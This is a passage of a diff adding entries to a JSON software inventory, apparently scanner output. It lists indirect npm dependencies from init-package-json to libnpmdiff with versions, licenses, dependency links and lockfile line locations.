"PURL": "pkg:npm/init-package-json@8.2.2", + "UID": "f6a54c3746e666ad" + }, + "Version": "8.2.2", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/package-json@7.0.1", + "npm-package-arg@13.0.1", + "promzard@2.0.0", + "read@4.1.0", + "semver@7.7.3", + "validate-npm-package-license@3.0.4", + "validate-npm-package-name@6.0.2" + ], + "Locations": [ + { + "StartLine": 14490, + "EndLine": 14506 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "invariant@2.2.4", + "Name": "invariant", + "Identifier": { + "PURL": "pkg:npm/invariant@2.2.4", + "UID": "5da1fd86efcd812b" + }, + "Version": "2.2.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "loose-envify@1.4.0" + ], + "Locations": [ + { + "StartLine": 10338, + "EndLine": 10346 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ip-address@10.0.1", + "Name": "ip-address", + "Identifier": { + "PURL": "pkg:npm/ip-address@10.0.1", + "UID": "6538401210ebfdee" + }, + "Version": "10.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10347, + "EndLine": 10356 + }, + { + "StartLine": 14507, + "EndLine": 14516 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "ip-regex@5.0.0", + "Name": "ip-regex", + "Identifier": { + "PURL": "pkg:npm/ip-regex@5.0.0", + "UID": "8b2ac664b63a17dc" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14517, + "EndLine": 14527 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-arguments@1.2.0", + "Name": "is-arguments", + "Identifier": { + "PURL": "pkg:npm/is-arguments@1.2.0", + "UID": "1f54ccc1c0bfae71" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "has-tostringtag@1.0.2" + ], + "Locations": [ + { + "StartLine": 10357, + "EndLine": 10372 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-arrayish@0.2.1", + "Name": "is-arrayish", + "Identifier": { + "PURL": "pkg:npm/is-arrayish@0.2.1", + "UID": "b4c0b320a66f90bd" + }, + "Version": "0.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10391, + "EndLine": 10396 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-arrayish@0.3.4", + "Name": "is-arrayish", + "Identifier": { + "PURL": "pkg:npm/is-arrayish@0.3.4", + "UID": "bfc8849fa78b36b4" + }, + "Version": "0.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 19681, + "EndLine": 19686 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-callable@1.2.7", + "Name": "is-callable", + "Identifier": { + "PURL": "pkg:npm/is-callable@1.2.7", + "UID": "3ad86d0f382455f9" + }, + "Version": "1.2.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10450, + "EndLine": 10461 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-cidr@6.0.1", + "Name": "is-cidr", + "Identifier": { + "PURL": "pkg:npm/is-cidr@6.0.1", + "UID": "9f61cae115e5c022" + }, + "Version": "6.0.1", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "cidr-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 14528, + "EndLine": 14538 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-core-module@2.16.1", + "Name": "is-core-module", + "Identifier": { + "PURL": "pkg:npm/is-core-module@2.16.1", + "UID": "38e2c8eb33cae185" + }, + "Version": "2.16.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 10462, + "EndLine": 10476 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-docker@2.2.1", + "Name": "is-docker", + "Identifier": { + "PURL": "pkg:npm/is-docker@2.2.1", + "UID": "9031bc7a3cb449a0" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10512, + "EndLine": 10526 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-extglob@2.1.1", + "Name": "is-extglob", + "Identifier": { + "PURL": "pkg:npm/is-extglob@2.1.1", + "UID": "336268a6f56c07a8" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10527, + "EndLine": 10535 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-fullwidth-code-point@1.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@1.0.0", + "UID": "ab843365774ef616" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "number-is-nan@1.0.1" + ], + "Locations": [ + { + "StartLine": 17362, + "EndLine": 17373 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-fullwidth-code-point@2.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@2.0.0", + "UID": "a58637eb431bf929" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10552, + "EndLine": 10561 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-fullwidth-code-point@3.0.0", + "Name": "is-fullwidth-code-point", + "Identifier": { + "PURL": "pkg:npm/is-fullwidth-code-point@3.0.0", + "UID": "6baf336fc54dac8a" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14539, + "EndLine": 14548 + }, + { + "StartLine": 20171, + "EndLine": 20179 + }, + { + "StartLine": 20180, + "EndLine": 20188 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-generator-function@1.1.2", + "Name": "is-generator-function", + "Identifier": { + "PURL": "pkg:npm/is-generator-function@1.1.2", + "UID": "4c245a6b031f7a73" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "generator-function@2.0.1", + "get-proto@1.0.1", + "has-tostringtag@1.0.2", + "safe-regex-test@1.1.0" + ], + "Locations": [ + { + "StartLine": 10572, + "EndLine": 10590 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-glob@4.0.3", + "Name": "is-glob", + "Identifier": { + "PURL": "pkg:npm/is-glob@4.0.3", + "UID": "839fc01c93e3d10f" + }, + "Version": "4.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-extglob@2.1.1" + ], + "Locations": [ + { + "StartLine": 10591, + "EndLine": 10602 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-interactive@1.0.0", + "Name": "is-interactive", + "Identifier": { + "PURL": "pkg:npm/is-interactive@1.0.0", + "UID": "19c449abc19d7ccd" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10603, + "EndLine": 10611 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-lambda@1.0.1", + "Name": "is-lambda", + "Identifier": { + "PURL": "pkg:npm/is-lambda@1.0.1", + "UID": "f35459f807e498ca" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10612, + "EndLine": 10618 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-number@7.0.0", + "Name": "is-number", + "Identifier": { + "PURL": "pkg:npm/is-number@7.0.0", + "UID": "e671573837f6a00f" + }, + "Version": "7.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10645, + "EndLine": 10653 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-plain-obj@1.1.0", + "Name": "is-plain-obj", + "Identifier": { + "PURL": "pkg:npm/is-plain-obj@1.1.0", + "UID": "452f0f2054799ec6" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 12860, + "EndLine": 12868 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-plain-obj@2.1.0", + "Name": "is-plain-obj", + "Identifier": { + "PURL": "pkg:npm/is-plain-obj@2.1.0", + "UID": "97dd0188552c8f32" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10681, + "EndLine": 10689 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-regex@1.2.1", + "Name": "is-regex", + "Identifier": { + "PURL": "pkg:npm/is-regex@1.2.1", + "UID": "6be382c339384c53" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "call-bound@1.0.4", + "gopd@1.2.0", + "has-tostringtag@1.0.2", + "hasown@2.0.2" + ], + "Locations": [ + { + "StartLine": 10690, + "EndLine": 10707 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-stream@1.1.0", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@1.1.0", + "UID": "3375780eb1321615" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 13222, + "EndLine": 13230 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-stream@2.0.1", + "Name": "is-stream", + "Identifier": { + "PURL": "pkg:npm/is-stream@2.0.1", + "UID": "d5ed279d40ee8fbd" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10737, + "EndLine": 10748 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-typed-array@1.1.15", + "Name": "is-typed-array", + "Identifier": { + "PURL": "pkg:npm/is-typed-array@1.1.15", + "UID": "744136c53ffb383c" + }, + "Version": "1.1.15", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "which-typed-array@1.1.19" + ], + "Locations": [ + { + "StartLine": 10784, + "EndLine": 10798 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-unicode-supported@0.1.0", + "Name": "is-unicode-supported", + "Identifier": { + "PURL": "pkg:npm/is-unicode-supported@0.1.0", + "UID": "50ca81742e2f4e3c" + }, + "Version": "0.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10799, + "EndLine": 10810 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-wsl@1.1.0", + "Name": "is-wsl", + "Identifier": { + "PURL": "pkg:npm/is-wsl@1.1.0", + "UID": "e12b05528f66bd39" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10857, + "EndLine": 10866 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "is-wsl@2.2.0", + "Name": "is-wsl", + "Identifier": { + "PURL": "pkg:npm/is-wsl@2.2.0", + "UID": "db729d2f4f88e745" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-docker@2.2.1" + ], + "Locations": [ + { + "StartLine": 4642, + "EndLine": 4653 + }, + { + "StartLine": 7046, + "EndLine": 7057 + }, + { + "StartLine": 7072, + "EndLine": 7083 + }, + { + "StartLine": 16415, + "EndLine": 16427 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isarray@1.0.0", + "Name": "isarray", + "Identifier": { + "PURL": "pkg:npm/isarray@1.0.0", + "UID": "71e77d50f743322c" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 17374, + "EndLine": 17379 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isexe@2.0.0", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@2.0.0", + "UID": "1a7351a2f4c30bab" + }, + "Version": "2.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10874, + "EndLine": 10879 + }, + { + "StartLine": 14219, + "EndLine": 14225 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isexe@3.1.1", + "Name": "isexe", + "Identifier": { + "PURL": "pkg:npm/isexe@3.1.1", + "UID": "b3d24e9281408eeb" + }, + "Version": "3.1.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14549, + "EndLine": 14556 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "isomorphic-fetch@2.2.1", + "Name": "isomorphic-fetch", + "Identifier": { + "PURL": "pkg:npm/isomorphic-fetch@2.2.1", + "UID": "1b8183746265654" + }, + "Version": "2.2.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "node-fetch@1.7.3", + "whatwg-fetch@3.6.20" + ], + "Locations": [ + { + "StartLine": 10880, + "EndLine": 10889 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "istanbul-lib-coverage@3.2.2", + "Name": "istanbul-lib-coverage", + "Identifier": { + "PURL": "pkg:npm/istanbul-lib-coverage@3.2.2", + "UID": "9db5375cbd971ad" + }, + "Version": "3.2.2", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10890, + "EndLine": 10898 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "istanbul-lib-instrument@5.2.1", + "Name": "istanbul-lib-instrument", + "Identifier": { + "PURL": "pkg:npm/istanbul-lib-instrument@5.2.1", + "UID": "9a3e5c10da1386ff" + }, + "Version": "5.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/core@7.28.4", + "@babel/parser@7.28.4", + "@istanbuljs/schema@0.1.3", + "istanbul-lib-coverage@3.2.2", + "semver@6.3.1" + ], + "Locations": [ + { + "StartLine": 6291, + "EndLine": 6306 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jackspeak@3.4.3", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@3.4.3", + "UID": "f61d9b4149d7a829" + }, + "Version": "3.4.3", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/cliui@8.0.2", + "@pkgjs/parseargs@0.11.0" + ], + "Locations": [ + { + "StartLine": 10991, + "EndLine": 11005 + }, + { + "StartLine": 15037, + "EndLine": 15052 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jackspeak@4.1.1", + "Name": "jackspeak", + "Identifier": { + "PURL": "pkg:npm/jackspeak@4.1.1", + "UID": "65a011f519731efd" + }, + "Version": "4.1.1", + "Licenses": [ + "BlueOak-1.0.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/cliui@8.0.2" + ], + "Locations": [ + { + "StartLine": 14557, + "EndLine": 14570 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-environment-node@29.7.0", + "Name": "jest-environment-node", + "Identifier": { + "PURL": "pkg:npm/jest-environment-node@29.7.0", + "UID": "181f8fd2d42e8dab" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/environment@29.7.0", + "@jest/fake-timers@29.7.0", + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-mock@29.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 11206, + "EndLine": 11222 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-get-type@29.6.3", + "Name": "jest-get-type", + "Identifier": { + "PURL": "pkg:npm/jest-get-type@29.6.3", + "UID": "bea0f86f787fbee1" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11223, + "EndLine": 11231 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-haste-map@29.7.0", + "Name": "jest-haste-map", + "Identifier": { + "PURL": "pkg:npm/jest-haste-map@29.7.0", + "UID": "e40d9e03c90143cc" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/graceful-fs@4.1.9", + "@types/node@24.7.0", + "anymatch@3.1.3", + "fb-watchman@2.0.2", + "fsevents@2.3.3", + "graceful-fs@4.2.11", + "jest-regex-util@29.6.3", + "jest-util@29.7.0", + "jest-worker@29.7.0", + "micromatch@4.0.8", + "walker@1.0.8" + ], + "Locations": [ + { + "StartLine": 11232, + "EndLine": 11256 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-message-util@29.7.0", + "Name": "jest-message-util", + "Identifier": { + "PURL": "pkg:npm/jest-message-util@29.7.0", + "UID": "5a2553c2b2e6d806" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@babel/code-frame@7.27.1", + "@jest/types@29.6.3", + "@types/stack-utils@2.0.3", + "chalk@4.1.2", + "graceful-fs@4.2.11", + "micromatch@4.0.8", + "pretty-format@29.7.0", + "slash@3.0.0", + "stack-utils@2.0.6" + ], + "Locations": [ + { + "StartLine": 11287, + "EndLine": 11306 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-mock@29.7.0", + "Name": "jest-mock", + "Identifier": { + "PURL": "pkg:npm/jest-mock@29.7.0", + "UID": "8eef8bba47d2744e" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/node@24.7.0", + "jest-util@29.7.0" + ], + "Locations": [ + { + "StartLine": 11307, + "EndLine": 11320 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-regex-util@29.6.3", + "Name": "jest-regex-util", + "Identifier": { + "PURL": "pkg:npm/jest-regex-util@29.6.3", + "UID": "13f9d0c61a530470" + }, + "Version": "29.6.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11339, + "EndLine": 11347 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-util@29.7.0", + "Name": "jest-util", + "Identifier": { + "PURL": "pkg:npm/jest-util@29.7.0", + "UID": "323c67ec08569d61" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "@types/node@24.7.0", + "chalk@4.1.2", + "ci-info@3.9.0", + "graceful-fs@4.2.11", + "picomatch@2.3.1" + ], + "Locations": [ + { + "StartLine": 11495, + "EndLine": 11511 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-validate@29.7.0", + "Name": "jest-validate", + "Identifier": { + "PURL": "pkg:npm/jest-validate@29.7.0", + "UID": "1bb3171dd9c3ca23" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jest/types@29.6.3", + "camelcase@6.3.0", + "chalk@4.1.2", + "jest-get-type@29.6.3", + "leven@3.1.0", + "pretty-format@29.7.0" + ], + "Locations": [ + { + "StartLine": 11512, + "EndLine": 11528 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jest-worker@29.7.0", + "Name": "jest-worker", + "Identifier": { + "PURL": "pkg:npm/jest-worker@29.7.0", + "UID": "e5e921e8bfa51598" + }, + "Version": "29.7.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@types/node@24.7.0", + "jest-util@29.7.0", + "merge-stream@2.0.0", + "supports-color@8.1.1" + ], + "Locations": [ + { + "StartLine": 11561, + "EndLine": 11575 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "joi@17.13.3", + "Name": "joi", + "Identifier": { + "PURL": "pkg:npm/joi@17.13.3", + "UID": "8aba80b82bd30103" + }, + "Version": "17.13.3", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@hapi/hoek@9.3.0", + "@hapi/topo@5.1.0", + "@sideway/address@4.1.5", + "@sideway/formula@3.0.1", + "@sideway/pinpoint@2.0.0" + ], + "Locations": [ + { + "StartLine": 11591, + "EndLine": 11604 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-tokens@4.0.0", + "Name": "js-tokens", + "Identifier": { + "PURL": "pkg:npm/js-tokens@4.0.0", + "UID": "79d7a5b21eedbda6" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11605, + "EndLine": 11610 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-yaml@3.14.1", + "Name": "js-yaml", + "Identifier": { + "PURL": "pkg:npm/js-yaml@3.14.1", + "UID": "7dfa3f9a3b4da359" + }, + "Version": "3.14.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@1.0.10", + "esprima@4.0.1" + ], + "Locations": [ + { + "StartLine": 3454, + "EndLine": 3466 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "js-yaml@4.1.0", + "Name": "js-yaml", + "Identifier": { + "PURL": "pkg:npm/js-yaml@4.1.0", + "UID": "d8116734d3e150a5" + }, + "Version": "4.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "argparse@2.0.1" + ], + "Locations": [ + { + "StartLine": 11611, + "EndLine": 11622 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsc-safe-url@0.2.4", + "Name": "jsc-safe-url", + "Identifier": { + "PURL": "pkg:npm/jsc-safe-url@0.2.4", + "UID": "7cef32bde1b8549e" + }, + "Version": "0.2.4", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11623, + "EndLine": 11628 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsesc@3.1.0", + "Name": "jsesc", + "Identifier": { + "PURL": "pkg:npm/jsesc@3.1.0", + "UID": "1560ad0f5ad4793d" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11629, + "EndLine": 11640 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "json-parse-even-better-errors@2.3.1", + "Name": "json-parse-even-better-errors", + "Identifier": { + "PURL": "pkg:npm/json-parse-even-better-errors@2.3.1", + "UID": "519da86049b3e078" + }, + "Version": "2.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11648, + "EndLine": 11653 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "json-parse-even-better-errors@4.0.0", + "Name": "json-parse-even-better-errors", + "Identifier": { + "PURL": "pkg:npm/json-parse-even-better-errors@4.0.0", + "UID": "ccd861e8406b66c8" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14571, + "EndLine": 14578 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "json-stringify-nice@1.1.4", + "Name": "json-stringify-nice", + "Identifier": { + "PURL": "pkg:npm/json-stringify-nice@1.1.4", + "UID": "5c43d6fca301cb32" + }, + "Version": "1.1.4", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14579, + "EndLine": 14588 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "json5@2.2.3", + "Name": "json5", + "Identifier": { + "PURL": "pkg:npm/json5@2.2.3", + "UID": "f245229eea3c095" + }, + "Version": "2.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11688, + "EndLine": 11699 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsonfile@4.0.0", + "Name": "jsonfile", + "Identifier": { + "PURL": "pkg:npm/jsonfile@4.0.0", + "UID": "78c2a953542e71fd" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11" + ], + "Locations": [ + { + "StartLine": 11700, + "EndLine": 11708 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsonfile@6.2.0", + "Name": "jsonfile", + "Identifier": { + "PURL": "pkg:npm/jsonfile@6.2.0", + "UID": "a902839ec7cfa7a7" + }, + "Version": "6.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "graceful-fs@4.2.11", + "universalify@2.0.1" + ], + "Locations": [ + { + "StartLine": 16428, + "EndLine": 16440 + }, + { + "StartLine": 17620, + "EndLine": 17631 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "jsonparse@1.3.1", + "Name": "jsonparse", + "Identifier": { + "PURL": "pkg:npm/jsonparse@1.3.1", + "UID": "f0121e0717d6f941" + }, + "Version": "1.3.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14589, + "EndLine": 14598 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "just-diff@6.0.2", + "Name": "just-diff", + "Identifier": { + "PURL": "pkg:npm/just-diff@6.0.2", + "UID": "d943bd72f344e042" + }, + "Version": "6.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14599, + "EndLine": 14605 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "just-diff-apply@5.5.0", + "Name": "just-diff-apply", + "Identifier": { + "PURL": "pkg:npm/just-diff-apply@5.5.0", + "UID": "65c64bc428a49047" + }, + "Version": "5.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 14606, + "EndLine": 14612 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "kind-of@6.0.3", + "Name": "kind-of", + "Identifier": { + "PURL": "pkg:npm/kind-of@6.0.3", + "UID": "a4c3816de41f6a69" + }, + "Version": "6.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11745, + "EndLine": 11753 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "kleur@3.0.3", + "Name": "kleur", + "Identifier": { + "PURL": "pkg:npm/kleur@3.0.3", + "UID": "ebc36ab264ec0862" + }, + "Version": "3.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11764, + "EndLine": 11772 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "launch-editor@2.11.1", + "Name": "launch-editor", + "Identifier": { + "PURL": "pkg:npm/launch-editor@2.11.1", + "UID": "bcebec8dc3411b47" + }, + "Version": "2.11.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "picocolors@1.1.1", + "shell-quote@1.8.3" + ], + "Locations": [ + { + "StartLine": 11773, + "EndLine": 11782 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "leven@3.1.0", + "Name": "leven", + "Identifier": { + "PURL": "pkg:npm/leven@3.1.0", + "UID": "9713d88e5c3048e" + }, + "Version": "3.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 11783, + "EndLine": 11791 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmaccess@10.0.3", + "Name": "libnpmaccess", + "Identifier": { + "PURL": "pkg:npm/libnpmaccess@10.0.3", + "UID": "ba5c5e151e972817" + }, + "Version": "10.0.3", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "npm-package-arg@13.0.1", + "npm-registry-fetch@19.0.0" + ], + "Locations": [ + { + "StartLine": 14613, + "EndLine": 14626 + } + ], + "AnalyzedBy": "npm" + }, + { + "ID": "libnpmdiff@8.0.9", + "Name": "libnpmdiff", + "Identifier": { + "PURL": "pkg:npm/libnpmdiff@8.0.9", + "UID": "4e69536311eb8399" + }, + "Version": "8.0.9", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@npmcli/arborist@9.1.6", 